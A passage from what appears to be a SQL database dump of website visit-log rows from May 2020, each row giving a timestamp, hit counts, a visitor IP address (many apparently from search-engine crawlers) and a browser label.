3,1,1,0,0,'66.249.64.33','chrome'),(504765,1589311852,1,1,0,0,'66.249.70.72','chrome'),(504766,1589312086,1,1,0,0,'66.249.70.70','chrome'),(504767,1589312404,1,1,0,0,'66.249.70.69','chrome'),(504768,1589312797,8,8,0,0,'77.120.98.235','other'),(504769,1589313705,3,3,0,0,'66.249.70.69','chrome'),(504770,1589314205,1,1,0,0,'66.249.70.72','chrome'),(504771,1589314223,1,1,0,0,'213.180.203.16','other'),(504772,1589314366,2,2,0,0,'8.29.198.27','other'),(504773,1589314902,8,8,0,0,'77.120.98.235','other'),(504774,1589315791,1,1,0,0,'66.249.64.33','chrome'),(504775,1589315817,1,1,0,0,'66.249.70.70','chrome'),(504776,1589316963,8,8,0,0,'77.120.98.235','other'),(504777,1589317082,2,2,0,0,'66.249.64.38','chrome'),(504778,1589317378,1,1,0,0,'66.249.64.36','chrome'),(504779,1589317514,1,1,0,0,'66.249.70.72','chrome'),(504780,1589317758,1,1,0,0,'213.180.203.16','other'),(504781,1589318989,10,10,0,0,'91.211.251.49','chrome'),(504782,1589319088,8,8,0,0,'77.120.98.235','other'),(504783,1589319356,3,3,0,0,'66.249.70.70','chrome'),(504784,1589320799,1,1,0,0,'66.249.70.72','chrome'),(504785,1589320937,2,2,0,0,'66.249.70.69','chrome'),(504786,1589321030,1,1,0,0,'157.55.39.51','other'),(504787,1589321177,8,8,0,0,'77.120.98.235','other'),(504788,1589321692,3,3,0,0,'207.46.13.219','other'),(504789,1589321966,1,1,0,0,'109.106.23.196','msie'),(504790,1589321993,1,1,0,0,'157.55.39.51','other'),(504791,1589322211,1,1,0,0,'178.154.200.92','other'),(504792,1589322212,1,1,0,0,'66.249.70.72','chrome'),(504793,1589322373,1,1,0,0,'178.154.200.97','other'),(504794,1589322837,1,1,0,0,'66.249.70.70','chrome'),(504795,1589323104,1,1,0,0,'207.46.13.219','other'),(504796,1589323263,1,1,0,0,'178.154.200.222','other'),(504797,1589323296,8,8,0,0,'77.120.98.235','other'),(504798,1589323373,2,2,0,0,'213.180.203.16','other'),(504799,1589323393,1,1,0,0,'188.163.74.113','chrome'),(504800,1589323883,2,2,0,0,'66.249.64.36','chrome'),(504801,1589324011,1,1,0,0,'207.46.13.219','other'),(504802,1589324757,1,1,0,0,'66.249.70.70','chrome'),(504803,1589324947,1,1,0,0,'207.46.13.219','other'),(504804,1589325196,1,1,0,0,'8.29.198.26','other'),(504805,1589325327,8,8,0,0,'77.120.98.235','other'),(504806,1589325438,1,1,0,0,'8.29.198.27','other'),(504807,1589325845,1,1,0,0,'157.55.39.51','other'),(504808,1589326573,1,1,0,0,'66.249.64.38','chrome'),(504809,1589326913,1,1,0,0,'178.154.200.222','other'),(504810,1589327472,8,8,0,0,'77.120.98.235','other'),(504811,1589327666,2,2,0,0,'66.249.70.72','chrome'),(504812,1589327706,1,1,0,0,'62.205.134.182','other'),(504813,1589327725,2,2,0,0,'207.46.13.219','other'),(504814,1589328623,2,2,0,0,'66.249.70.70','chrome'),(504815,1589328856,1,1,0,0,'178.154.200.222','other'),(504816,1589329430,1,1,0,0,'66.249.64.38','chrome'),(504817,1589329635,8,8,0,0,'77.120.98.235','other'),(504818,1589329664,1,1,0,0,'66.249.64.36','chrome'),(504819,1589329888,1,1,0,0,'66.249.70.70','chrome'),(504820,1589330553,1,1,0,0,'66.249.64.38','chrome'),(504821,1589330627,1,1,0,0,'66.249.70.69','chrome'),(504822,1589331704,8,8,0,0,'77.120.98.235','other'),(504823,1589333093,2,2,0,0,'66.249.70.69','chrome'),(504824,1589333358,1,1,0,0,'69.171.251.112','other'),(504825,1589333359,1,1,0,0,'69.171.251.117','other'),(504826,1589333777,8,8,0,0,'77.120.98.235','other'),(504827,1589333957,1,1,0,0,'178.154.200.236','other'),(504828,1589334155,1,1,0,0,'178.154.200.222','other'),(504829,1589334758,2,2,0,0,'207.46.13.185','other'),(504830,1589334917,1,1,0,0,'207.46.13.219','other'),(504831,1589335195,1,1,0,0,'66.249.70.69','chrome'),(504832,1589335455,1,1,0,0,'66.249.64.38','chrome'),(504833,1589335728,1,1,0,0,'207.46.13.185','other'),(504834,1589335813,8,8,0,0,'77.120.98.235','other'),(504835,1589335889,1,1,0,0,'178.154.200.222','other'),(504836,1589336029,1,1,0,0,'8.29.198.27','other'),(504837,1589336267,1,1,0,0,'8.29.198.25','other'),(504838,1589336302,1,1,0,0,'213.180.203.16','other'),(504839,1589337011,1,1,0,0,'66.249.64.38','chrome'),(504840,1589337855,8,8,0,0,'77.120.98.235','other'),(504841,1589338502,1,1,0,0,'213.180.203.122','other'),(504842,1589338731,1,1,0,0,'178.154.200.222','other'),(504843,1589339306,3,3,0,0,'157.55.39.51','other'),(504844,1589339900,8,8,0,0,'77.120.98.235','other'),(504845,1589339967,1,1,0,0,'66.249.64.38','chrome'),(504846,1589340404,2,2,0,0,'66.249.70.72','chrome'),(504847,1589340752,1,1,0,0,'66.249.70.69','chrome'),(504848,1589341066,1,1,0,0,'207.46.13.185','other'),(504849,1589341615,1,1,0,0,'213.180.203.16','other'),(504850,1589341932,8,8,0,0,'77.120.98.235','other'),(504851,1589342389,1,1,0,0,'178.154.200.222','other'),(504852,1589342834,1,1,0,0,'66.249.70.69','chrome'),(504853,1589343047,1,1,0,0,'66.249.70.72','chrome'),(504854,1589343237,1,1,0,0,'207.46.13.219','other'),(504855,1589343809,3,3,0,0,'178.154.200.222','other'),(504856,1589343994,8,8,0,0,'77.120.98.235','other'),(504857,1589344389,1,1,0,0,'213.180.203.16','other'),(504858,1589344395,1,1,0,0,'66.249.64.38','chrome'),(504859,1589344582,2,2,0,0,'66.249.70.70','chrome'),(504860,1589345174,1,1,0,0,'62.205.134.182','other'),(504861,1589345535,1,1,0,0,'66.249.70.72','chrome'),(504862,1589345602,2,2,0,0,'207.46.13.166','other'),(504863,1589345912,3,3,0,0,'207.46.13.200','other'),(504864,1589346028,1,1,0,0,'213.180.203.17','other'),(504865,1589346060,1,1,0,0,'66.249.64.36','chrome'),(504866,1589346161,8,8,0,0,'77.120.98.235','other'),(504867,1589346306,1,1,0,0,'178.154.200.222','other'),(504868,1589346853,2,2,0,0,'8.29.198.27','other'),(504869,1589346903,1,1,0,0,'213.180.203.16','other'),(504870,1589347039,1,1,0,0,'66.249.70.72','chrome'),(504871,1589347408,3,3,0,0,'178.154.200.222','other'),(504872,1589347446,1,1,0,0,'213.180.203.109','other'),(504873,1589347637,2,2,0,0,'66.249.70.69','chrome'),(504874,1589347803,1,1,0,0,'66.249.64.33','chrome'),(504875,1589348219,1,1,0,0,'157.55.39.203','other'),(504876,1589348308,8,8,0,0,'77.120.98.235','other'),(504877,1589348466,1,1,0,0,'194.61.24.94','other'),(504878,1589348938,1,1,0,0,'66.249.70.72','chrome'),(504879,1589348939,1,1,0,0,'188.163.74.113','chrome'),(504880,1589350435,8,8,0,0,'77.120.98.235','other'),(504881,1589350788,1,1,0,0,'178.154.200.222','other'),(504882,1589351579,1,1,0,0,'188.226.24.102','chrome'),(504883,1589351602,1,1,0,0,'128.69.173.67','chrome'),(504884,1589351990,1,1,0,0,'207.46.13.185','other'),(504885,1589352538,8,8,0,0,'77.120.98.235','other'),(504886,1589352613,1,1,0,0,'213.180.203.16','other'),(504887,1589353054,1,1,0,0,'66.249.70.69','chrome'),(504888,1589353621,1,1,0,0,'66.249.64.33','chrome'),(504889,1589353766,2,2,0,0,'66.249.64.38','chrome'),(504890,1589354083,1,1,0,0,'178.154.200.196','other'),(504891,1589354437,1,1,0,0,'66.249.70.69','chrome'),(504892,1589354545,2,2,0,0,'207.46.13.200','other'),(504893,1589354613,2,2,0,0,'157.55.39.203','other'),(504894,1589354640,8,8,0,0,'77.120.98.235','other'),(504895,1589354697,1,1,0,0,'66.249.70.70','chrome'),(504896,1589354724,1,1,0,0,'138.246.253.15','chrome'),(504897,1589354733,1,1,0,0,'207.46.13.185','other'),(504898,1589355161,1,1,0,0,'131.220.6.152','chrome'),(504899,1589355331,1,1,0,0,'5.196.80.103','firefox'),(504900,1589356699,1,1,0,0,'92.38.136.69','chrome'),(504901,1589356749,8,8,0,0,'77.120.98.235','other'),(504902,1589356850,1,1,0,0,'213.180.203.142','other'),(504903,1589357210,1,1,0,0,'104.248.84.67','chrome'),(504904,1589357263,1,1,0,0,'66.249.70.72','chrome'),(504905,1589357463,1,1,0,0,'178.154.200.216','other'),(504906,1589357678,1,1,0,0,'8.29.198.26','other'),(504907,1589357728,1,1,0,0,'178.154.200.222','other'),(504908,1589357870,1,1,0,0,'213.180.203.16','other'),(504909,1589357940,1,1,0,0,'8.29.198.25','other'),(504910,1589358861,8,8,0,0,'77.120.98.235','other'),(504911,1589358876,3,3,0,0,'66.249.70.69','chrome'),(504912,1589358969,2,2,0,0,'66.249.70.72','chrome'),(504913,1589359849,1,1,0,0,'91.124.119.213','chrome'),(504914,1589360182,2,2,0,0,'66.249.70.70','chrome'),(504915,1589360192,1,1,0,0,'173.252.111.22','other'),(504916,1589360193,2,2,0,0,'173.252.111.19','other'),(504917,1589360194,1,1,0,0,'173.252.111.5','other'),(504918,1589360744,3,3,0,0,'66.249.70.69','chrome'),(504919,1589360990,8,8,0,0,'77.120.98.235','other'),(504920,1589361378,1,1,0,0,'207.46.13.185','other'),(504921,1589361962,1,1,0,0,'66.249.70.74','chrome'),(504922,1589362139,1,1,0,0,'93.79.114.147','chrome'),(504923,1589362315,2,2,0,0,'66.249.70.70','chrome'),(504924,1589362355,1,1,0,0,'18.234.98.241','chrome'),(504925,1589362513,1,1,0,0,'91.196.178.88','firefox'),(504926,1589362515,1,1,0,0,'91.196.177.46','firefox'),(504927,1589362617,1,1,0,0,'66.249.70.69','chrome'),(504928,1589363118,8,8,0,0,'77.120.98.235','other'),(504929,1589363978,1,1,0,0,'213.180.203.16','other'),(504930,1589364103,1,1,0,0,'93.79.114.147','chrome'),(504931,1589364355,1,1,0,0,'66.249.70.70','chrome'),(504932,1589364797,2,2,0,0,'66.249.70.69','chrome'),(504933,1589365250,8,8,0,0,'77.120.98.235','other'),(504934,1589365297,2,2,0,0,'66.249.70.70','chrome'),(504935,1589365976,2,2,0,0,'207.46.13.185','other'),(504936,1589366354,1,1,0,0,'66.249.70.69','chrome'),(504937,1589367397,8,8,0,0,'77.120.98.235','other'),(504938,1589367420,1,1,0,0,'66.249.70.72','chrome'),(504939,1589367987,2,2,0,0,'66.249.70.70','chrome'),(504940,1589368046,2,2,0,0,'95.213.141.126','opera'),(504941,1589368097,1,1,0,0,'66.249.64.38','chrome'),(504942,1589368503,2,2,0,0,'8.29.198.27','other'),(504943,1589368712,5,5,0,0,'207.46.13.185','other'),(504944,1589369194,1,1,0,0,'157.55.39.203','other'),(504945,1589369467,1,1,0,0,'109.74.154.72','chrome'),(504946,1589369512,8,8,0,0,'77.120.98.235','other'),(504947,1589369545,3,3,0,0,'207.46.13.200','other'),(504948,1589369805,1,1,0,0,'193.93.231.87','other'),(504949,1589369807,1,1,0,0,'193.93.231.87','msie'),(504950,1589369809,1,1,0,0,'193.93.231.87','chrome'),(504951,1589369835,1,1,0,0,'66.249.70.69','chrome'),(504952,1589369921,1,1,0,0,'91.196.177.46','chrome'),(504953,1589370322,1,1,0,0,'91.196.178.79','firefox'),(504954,1589370436,1,1,0,0,'178.154.200.220','other'),(504955,1589370630,2,2,0,0,'66.249.70.72','chrome'),(504956,1589370909,1,1,0,0,'91.196.178.88','firefox'),(504957,1589371110,1,1,0,0,'66.249.64.38','chrome'),(504958,1589371141,1,1,0,0,'66.249.70.70','chrome'),(504959,1589371621,8,8,0,0,'77.120.98.235','other'),(504960,1589372057,1,1,0,0,'207.46.13.185','other'),(504961,1589372183,1,1,0,0,'178.154.200.222','other'),(504962,1589372541,1,1,0,0,'207.46.13.200','other'),(504963,1589373108,2,2,0,0,'66.249.70.72','chrome'),(504964,1589373739,8,8,0,0,'77.120.98.235','other'),(504965,1589374066,2,2,0,0,'207.46.13.185','other'),(504966,1589374512,1,1,0,0,'66.249.70.69','chrome'),(504967,1589374518,1,1,0,0,'91.196.178.93','chrome'),(504968,1589375014,1,1,0,0,'178.154.200.222','other'),(504969,1589375470,1,1,0,0,'207.46.13.148','other'),(504970,1589375819,1,1,0,0,'66.249.70.70','chrome'),(504971,1589375855,8,8,0,0,'77.120.98.235','other'),(504972,1589376483,1,1,0,0,'178.154.200.222','other'),(504973,1589376515,1,1,0,0,'207.46.13.185','other'),(504974,1589376541,1,1,0,0,'207.46.13.200','other'),(504975,1589377237,1,1,0,0,'207.46.13.148','other'),(504976,1589377979,8,8,0,0,'77.120.98.235','other'),(504977,1589378140,1,1,0,0,'207.46.13.185','other'),(504978,1589379339,2,2,0,0,'8.29.198.26','other'),(504979,1589379577,1,1,0,0,'188.163.75.43','msie'),(504980,1589380216,8,8,0,0,'77.120.98.235','other'),(504981,1589380337,2,2,0,0,'207.46.13.148','other'),(504982,1589380530,1,1,0,0,'207.46.13.200','other'),(504983,1589380828,1,1,0,0,'213.180.203.140','other'),(504984,1589381782,1,1,0,0,'66.249.70.69','chrome'),(504985,1589381849,1,1,0,0,'66.249.70.70','chrome'),(504986,1589381928,1,1,0,0,'66.249.64.33','chrome'),(504987,1589382048,1,1,0,0,'66.249.70.72','chrome'),(504988,1589382324,1,1,0,0,'207.46.13.200','other'),(504989,1589382448,1,1,0,0,'66.249.64.38','chrome'),(504990,1589382502,1,1,0,0,'188.163.75.43','msie'),(504991,1589382526,8,8,0,0,'77.120.98.235','other'),(504992,1589383141,1,1,0,0,'2.47.39.213','other'),(504993,1589383655,1,1,0,0,'66.249.64.33','chrome'),(504994,1589383681,1,1,0,0,'66.249.70.72','chrome'),(504995,1589383858,1,1,0,0,'66.249.70.69','chrome'),(504996,1589384132,1,1,0,0,'66.249.70.70','chrome'),(504997,1589384303,1,1,0,0,'207.46.13.148','other'),(504998,1589384761,8,8,0,0,'77.120.98.235','other'),(504999,1589384871,1,1,0,0,'188.165.251.196','firefox'),(505000,1589385549,1,1,0,0,'66.249.64.33','chrome'),(505001,1589386060,1,1,0,0,'207.46.13.148','other'),(505002,1589386111,1,1,0,0,'66.249.70.69','chrome'),(505003,1589386230,3,3,0,0,'34.205.252.101','chrome'),(505004,1589386540,1,1,0,0,'157.55.39.230','other'),(505005,1589387115,8,8,0,0,'77.120.98.235','other'),(505006,1589387396,3,3,0,0,'66.249.70.69','chrome'),(505007,1589387928,1,1,0,0,'66.249.64.38','chrome'),(505008,1589388664,1,1,0,0,'207.46.13.148','other'),(505009,1589388891,1,1,0,0,'188.163.75.43','msie'),(505010,1589388920,3,3,0,0,'207.46.13.185','other'),(505011,1589389363,8,8,0,0,'77.120.98.235','other'),(505012,1589389491,1,1,0,0,'66.249.64.38','chrome'),(505013,1589389678,1,1,0,0,'207.46.13.148','other'),(505014,1589389807,1,1,0,0,'34.254.177.18','chrome'),(505015,1589390171,1,1,0,0,'8.29.198.27','other'),(505016,1589390425,1,1,0,0,'8.29.198.25','other'),(505017,1589391547,8,8,0,0,'77.120.98.235','other'),(505018,1589391601,1,1,0,0,'157.55.39.230','other'),(505019,1589391869,1,1,0,0,'66.249.70.70','chrome'),(505020,1589391905,1,1,0,0,'66.249.70.69','chrome'),(505021,1589392025,1,1,0,0,'66.249.64.38','chrome'),(505022,1589392499,1,1,0,0,'66.249.70.72','chrome'),(505023,1589392750,1,1,0,0,'207.46.13.148','other'),(505024,1589393429,1,1,0,0,'157.55.39.230','other'),(505025,1589393719,8,8,0,0,'77.120.98.235','other'),(505026,1589394224,1,1,0,0,'194.44.132.26','chrome'),(505027,1589394539,2,2,0,0,'207.46.13.148','other'),(505028,1589394570,1,1,0,0,'66.249.70.69','chrome'),(505029,1589394670,1,1,0,0,'157.55.39.230','other'),(505030,1589395163,3,3,0,0,'66.249.70.70','chrome'),(505031,1589395642,1,1,0,0,'37.73.23.76','chrome'),(505032,1589395887,8,8,0,0,'77.120.98.235','other'),(505033,1589396036,1,1,0,0,'45.93.68.62','other'),(505034,1589396449,1,1,0,0,'66.249.70.72','chrome'),(505035,1589396563,1,1,0,0,'66.249.64.33','chrome'),(505036,1589397182,1,1,0,0,'157.55.39.230','other'),(505037,1589398043,8,8,0,0,'77.120.98.235','other'),(505038,1589398742,1,1,0,0,'66.249.70.69','chrome'),(505039,1589399503,2,2,0,0,'66.249.70.70','chrome'),(505040,1589400220,8,8,0,0,'77.120.98.235','other'),(505041,1589400279,2,2,0,0,'66.249.70.69','chrome'),(505042,1589400294,2,2,0,0,'207.46.13.148','other'),(505043,1589400513,2,2,0,0,'66.249.70.72','chrome'),(505044,1589400996,1,1,0,0,'8.29.198.25','other'),(505045,1589401252,1,1,0,0,'8.29.198.26','other'),(505046,1589401428,1,1,0,0,'66.249.64.38','chrome'),(505047,1589401566,1,1,0,0,'207.46.13.148','other'),(505048,1589401658,2,2,0,0,'66.249.70.70','chrome'),(505049,1589401826,1,0,1,0,'66.249.70.69',''),(505050,1589402397,8,8,0,0,'77.120.98.235','other'),(505051,1589402517,2,2,0,0,'173.252.111.1','other'),(505052,1589402518,1,1,0,0,'173.252.111.24','other'),(505054,1589402524,1,1,0,0,'173.252.111.3','other'),(505055,1589402540,1,1,0,0,'173.252.111.19','other'),(505056,1589402557,1,1,0,0,'66.249.64.36','chrome'),(505057,1589403438,1,1,0,0,'107.150.169.50','opera'),(505058,1589404084,1,1,0,0,'66.249.70.72','chrome'),(505059,1589404580,8,8,0,0,'77.120.98.235','other'),(505060,1589406689,1,1,0,0,'66.249.64.36','chrome'),(505061,1589406763,8,8,0,0,'77.120.98.235','other'),(505062,1589407044,1,1,0,0,'178.154.200.222','other'),(505063,1589407413,1,1,0,0,'91.209.11.236','other'),(505064,1589408938,8,8,0,0,'77.120.98.235','other'),(505065,1589409604,1,1,0,0,'66.249.70.70','chrome'),(505066,1589409878,1,1,0,0,'91.196.178.39','chrome'),(505067,1589410124,2,2,0,0,'66.249.64.33','chrome'),(505068,1589411080,8,8,0,0,'77.120.98.235','other'),(505069,1589411218,1,1,0,0,'37.59.145.21','chrome'),(505070,1589411269,1,1,0,0,'66.249.64.38','chrome'),(505071,1589411300,1,1,0,0,'207.46.13.206','other'),(505072,1589411385,1,1,0,0,'66.249.70.69','chrome'),(505073,1589411831,1,1,0,0,'8.29.198.26','other'),(505074,1589412090,1,1,0,0,'8.29.198.25','other'),(505075,1589412546,1,1,0,0,'66.249.70.69','chrome'),(505076,1589412596,2,2,0,0,'66.249.64.33','chrome'),(505077,1589412954,1,1,0,0,'178.154.200.222','other'),(505078,1589413251,8,8,0,0,'77.120.98.235','other'),(505079,1589414012,1,1,0,0,'66.249.70.70','chrome'),(505080,1589414106,1,1,0,0,'62.205.134.182','other'),(505081,1589414161,1,1,0,0,'5.196.80.103','firefox'),(505082,1589414488,2,2,0,0,'66.249.70.72','chrome'),(505083,1589415374,1,1,0,0,'184.94.240.92','firefox'),(505084,1589415383,2,1,1,0,'66.249.64.36',''),(505085,1589415463,8,8,0,0,'77.120.98.235','other'),(505086,1589415519,1,1,0,0,'66.249.70.72','chrome'),(505087,1589415923,1,1,0,0,'213.180.203.95','other'),(505088,1589416147,2,2,0,0,'66.249.64.33','chrome'),(505089,1589416153,1,1,0,0,'66.249.64.36','chrome'),(505090,1589416391,2,2,0,0,'66.249.70.70','chrome'),(505091,1589416772,1,1,0,0,'66.249.70.69','chrome'),(505092,1589417636,8,8,0,0,'77.120.98.235','other'),(505093,1589418251,1,1,0,0,'178.154.200.222','other'),(505094,1589418581,1,1,0,0,'66.249.70.72','chrome'),(505095,1589419207,1,1,0,0,'5.188.62.25','chrome'),(505096,1589419760,8,8,0,0,'77.120.98.235','other'),(505097,1589420419,1,1,0,0,'66.249.70.72','chrome'),(505098,1589420996,1,1,0,0,'138.246.253.15','chrome'),(505099,1589421870,8,8,0,0,'77.120.98.235','other'),(505100,1589421915,1,1,0,0,'209.17.96.146','other'),(505101,1589422653,1,1,0,0,'8.29.198.27','other'),(505102,1589422916,1,1,0,0,'8.29.198.25','other'),(505103,1589423272,1,1,0,0,'66.249.64.38','chrome'),(505104,1589423427,1,1,0,0,'66.249.70.72','chrome'),(505105,1589423639,1,1,0,0,'157.55.39.218','other'),(505106,1589423747,1,1,0,0,'178.154.200.222','other'),(505107,1589423848,2,2,0,0,'66.249.70.70','chrome'),(505108,1589423975,8,8,0,0,'77.120.98.235','other'),(505109,1589424013,1,1,0,0,'176.119.28.196','other'),(505110,1589425349,1,1,0,0,'79.137.130.109','chrome'),(505111,1589425470,1,1,0,0,'149.202.77.173','chrome'),(505112,1589426052,8,8,0,0,'77.120.98.235','other'),(505113,1589427463,1,1,0,0,'157.55.39.218','other'),(505114,1589428143,8,8,0,0,'77.120.98.235','other'),(505115,1589428547,1,1,0,0,'194.61.24.94','other'),(505116,1589428659,2,2,0,0,'66.249.70.69','chrome'),(505117,1589429233,1,1,0,0,'157.55.39.218','other'),(505118,1589429270,1,1,0,0,'178.159.37.88','chrome'),(505119,1589429611,1,1,0,0,'178.154.200.222','other'),(505120,1589429645,1,1,0,0,'66.249.64.36','chrome'),(505121,1589430175,1,1,0,0,'66.249.70.69','chrome'),(505122,1589430253,8,8,0,0,'77.120.98.235','other'),(505123,1589430319,1,1,0,0,'66.249.70.70','chrome'),(505124,1589430536,1,1,0,0,'157.55.39.218','other'),(505125,1589431491,1,1,0,0,'62.205.134.182','other'),(505126,1589432410,1,1,0,0,'157.55.39.218','other'),(505127,1589432461,8,8,0,0,'77.120.98.235','other'),(505128,1589433493,1,1,0,0,'8.29.198.26','other'),(505129,1589433668,1,1,0,0,'178.154.200.216','other'),(505130,1589433740,1,1,0,0,'8.29.198.25','other'),(505131,1589434636,1,1,0,0,'66.249.70.70','chrome'),(505132,1589434657,8,8,0,0,'77.120.98.235','other'),(505133,1589434702,1,1,0,0,'66.249.70.69','chrome'),(505134,1589434850,1,1,0,0,'46.211.219.131','chrome'),(505135,1589435301,1,1,0,0,'178.154.200.220','other'),(505136,1589435748,1,1,0,0,'66.249.70.69','chrome'),(505137,1589435893,1,1,0,0,'178.92.170.90','chrome'),(505138,1589435950,1,1,0,0,'66.249.64.36','chrome'),(505139,1589436136,2,2,0,0,'66.249.70.70','chrome'),(505140,1589436624,1,1,0,0,'207.46.13.163','other'),(505141,1589436855,8,8,0,0,'77.120.98.235','other'),(505142,1589437048,1,1,0,0,'178.154.200.222','other'),(505143,1589437501,1,1,0,0,'91.196.178.78','firefox'),(505144,1589437717,1,1,0,0,'66.249.70.72','chrome'),(505145,1589437919,1,1,0,0,'66.249.70.69','chrome'),(505146,1589438434,1,1,0,0,'91.196.178.78','firefox'),(505147,1589438945,1,1,0,0,'66.249.70.72','chrome'),(505148,1589439030,8,8,0,0,'77.120.98.235','other'),(505149,1589439642,1,1,0,0,'66.249.70.70','chrome'),(505150,1589440464,5,5,0,0,'207.46.13.163','other'),(505151,1589440466,1,1,0,0,'91.196.178.68','chrome'),(505152,1589440685,1,1,0,0,'178.251.109.168','chrome'),(505153,1589440956,1,1,0,0,'157.55.39.218','other'),(505154,1589441188,8,8,0,0,'77.120.98.235','other'),(505155,1589441757,1,1,0,0,'207.46.13.163','other'),(505156,1589441847,1,1,0,0,'178.154.200.220','other'),(505157,1589442223,1,1,0,0,'157.55.39.218','other'),(505158,1589442604,1,1,0,0,'66.249.70.69','chrome'),(505159,1589442993,1,1,0,0,'66.249.70.70','chrome'),(505160,1589443439,8,8,0,0,'77.120.98.235','other'),(505161,1589443597,1,1,0,0,'66.249.64.36','chrome'),(505162,1589444000,1,1,0,0,'178.154.200.196','other'),(505163,1589444018,2,2,0,0,'178.154.200.97','other'),(505164,1589444027,2,2,0,0,'162.241.65.44','other'),(505165,1589444115,1,1,0,0,'178.154.200.222','other'),(505166,1589444325,1,1,0,0,'8.29.198.25','other'),(505167,1589444515,1,1,0,0,'213.180.203.16','other'),(505168,1589444548,1,1,0,0,'178.154.200.236','other'),(505169,1589444567,1,1,0,0,'8.29.198.27','other'),(505170,1589445194,2,2,0,0,'66.249.70.72','chrome'),(505171,1589445238,1,1,0,0,'91.196.177.46','chrome'),(505172,1589445607,1,1,0,0,'178.154.200.222','other'),(505173,1589445699,8,8,0,0,'77.120.98.235','other'),(505174,1589446268,1,1,0,0,'213.180.203.16','other'),(505175,1589446874,2,2,0,0,'66.249.70.70','chrome'),(505176,1589446887,1,1,0,0,'178.154.200.220','other'),(505177,1589447351,2,2,0,0,'178.154.200.222','other'),(505178,1589447463,1,1,0,0,'66.249.70.69','chrome'),(505179,1589447642,1,1,0,0,'46.211.36.177','chrome'),(505180,1589447831,1,1,0,0,'66.249.70.72','chrome'),(505181,1589447926,8,8,0,0,'77.120.98.235','other'),(505182,1589448411,2,2,0,0,'213.180.203.16','other'),(505183,1589448748,1,1,0,0,'91.196.178.188','chrome'),(505184,1589448783,1,1,0,0,'66.249.70.70','chrome'),(505185,1589448968,1,1,0,0,'207.46.13.163','other'),(505186,1589449439,3,3,0,0,'213.180.203.16','other'),(505187,1589449540,1,1,0,0,'66.249.70.72','chrome'),(505188,1589449762,1,1,0,0,'178.154.200.220','other'),(505189,1589449904,3,3,0,0,'178.154.200.222','other'),(505190,1589450130,8,8,0,0,'77.120.98.235','other'),(505191,1589450852,2,2,0,0,'213.180.203.16','other'),(505192,1589450857,1,1,0,0,'66.249.64.38','chrome'),(505193,1589451023,2,2,0,0,'66.249.70.69','chrome'),(505194,1589451036,1,1,0,0,'178.154.200.196','other'),(505195,1589451151,1,1,0,0,'91.196.177.46','chrome'),(505196,1589451238,1,1,0,0,'66.249.70.70','chrome'),(505197,1589451314,2,2,0,0,'207.46.13.163','other'),(505198,1589451532,1,1,0,0,'213.180.203.122','other'),(505199,1589451880,1,1,0,0,'18.217.117.190','chrome'),(505200,1589452151,1,1,0,0,'213.180.203.17','other'),(505201,1589452344,8,8,0,0,'77.120.98.235','other'),(505202,1589452504,1,1,0,0,'178.154.200.222','other'),(505203,1589452546,1,1,0,0,'157.55.39.218','other'),(505204,1589453289,1,1,0,0,'213.156.89.212','chrome'),(505205,1589453567,2,2,0,0,'207.46.13.163','other'),(505206,1589453775,1,1,0,0,'66.249.70.70','chrome'),(505207,1589453869,1,1,0,0,'66.249.64.33','chrome'),(505208,1589454613,8,8,0,0,'77.120.98.235','other'),(505209,1589454894,1,1,0,0,'213.180.203.16','other'),(505210,1589455148,1,1,0,0,'8.29.198.27','other'),(505211,1589455250,2,2,0,0,'157.55.39.218','other'),(505212,1589455399,1,1,0,0,'8.29.198.26','other'),(505213,1589455728,1,1,0,0,'109.74.154.72','chrome'),(505214,1589456163,1,1,0,0,'178.154.200.222','other'),(505215,1589456217,1,0,1,0,'66.249.70.72',''),(505216,1589456413,1,1,0,0,'66.249.70.72','chrome'),(505217,1589456681,1,1,0,0,'66.249.70.70','chrome'),(505218,1589456762,2,2,0,0,'157.55.39.218','other'),(505219,1589456952,8,8,0,0,'77.120.98.235','other'),(505220,1589457046,1,1,0,0,'91.196.178.90','chrome'),(505221,1589457512,2,2,0,0,'207.46.13.163','other'),(505222,1589457604,1,1,0,0,'66.249.70.72','chrome'),(505223,1589459204,8,8,0,0,'77.120.98.235','other'),(505224,1589460209,1,1,0,0,'157.55.39.218','other'),(505225,1589461008,1,1,0,0,'178.154.200.222','other'),(505226,1589461115,1,1,0,0,'66.249.70.69','chrome'),(505227,1589461165,1,1,0,0,'213.180.203.122','other'),(505228,1589461281,1,1,0,0,'178.154.200.220','other'),(505229,1589461437,8,8,0,0,'77.120.98.235','other'),(505230,1589461926,1,1,0,0,'91.196.178.78','chrome'),(505231,1589462183,1,1,0,0,'207.46.13.163','other'),(505232,1589462202,2,2,0,0,'157.55.39.218','other'),(505233,1589462746,1,1,0,0,'88.155.122.109','chrome'),(505234,1589463298,1,1,0,0,'66.249.64.33','chrome'),(505235,1589463333,1,1,0,0,'66.249.70.69','chrome'),(505236,1589463343,2,2,0,0,'91.196.178.21','chrome'),(505237,1589463423,2,2,0,0,'66.249.70.72','chrome'),(505238,1589463661,8,8,0,0,'77.120.98.235','other'),(505239,1589464023,2,2,0,0,'207.46.13.163','other'),(505240,1589464120,1,1,0,0,'66.249.70.70','chrome'),(505241,1589464447,1,1,0,0,'66.249.70.69','chrome'),(505242,1589464528,2,2,0,0,'91.124.83.93','chrome'),(505243,1589464656,1,1,0,0,'91.196.178.90','chrome'),(505244,1589464861,2,2,0,0,'66.249.70.72','chrome'),(505245,1589465229,1,1,0,0,'157.55.39.218','other'),(505246,1589465518,1,1,0,0,'207.46.13.163','other'),(505247,1589465624,1,1,0,0,'66.249.70.70','chrome'),(505248,1589465818,1,1,0,0,'66.249.64.33','chrome'),(505249,1589465902,8,8,0,0,'77.120.98.235','other'),(505250,1589465981,1,1,0,0,'8.29.198.26','other'),(505251,1589466231,1,1,0,0,'8.29.198.25','other'),(505252,1589466337,1,1,0,0,'66.249.70.69','chrome'),(505253,1589466620,1,1,0,0,'66.249.70.70','chrome'),(505254,1589466700,1,1,0,0,'213.180.203.16','other'),(505255,1589468157,8,8,0,0,'77.120.98.235','other'),(505256,1589468324,2,2,0,0,'66.249.70.70','chrome'),(505257,1589468379,1,1,0,0,'66.249.70.69','chrome'),(505258,1589468523,1,1,0,0,'207.46.13.163','other'),(505259,1589468833,1,1,0,0,'157.55.39.218','other'),(505260,1589468836,2,2,0,0,'207.46.13.0','other'),(505261,1589469706,1,1,0,0,'66.249.70.72','chrome'),(505262,1589470035,3,3,0,0,'207.46.13.163','other'),(505263,1589470298,1,1,0,0,'176.37.20.175','firefox'),(505264,1589470397,8,8,0,0,'77.120.98.235','other'),(505265,1589470840,1,1,0,0,'66.249.70.72','chrome'),(505266,1589472118,1,1,0,0,'66.249.70.72','chrome'),(5052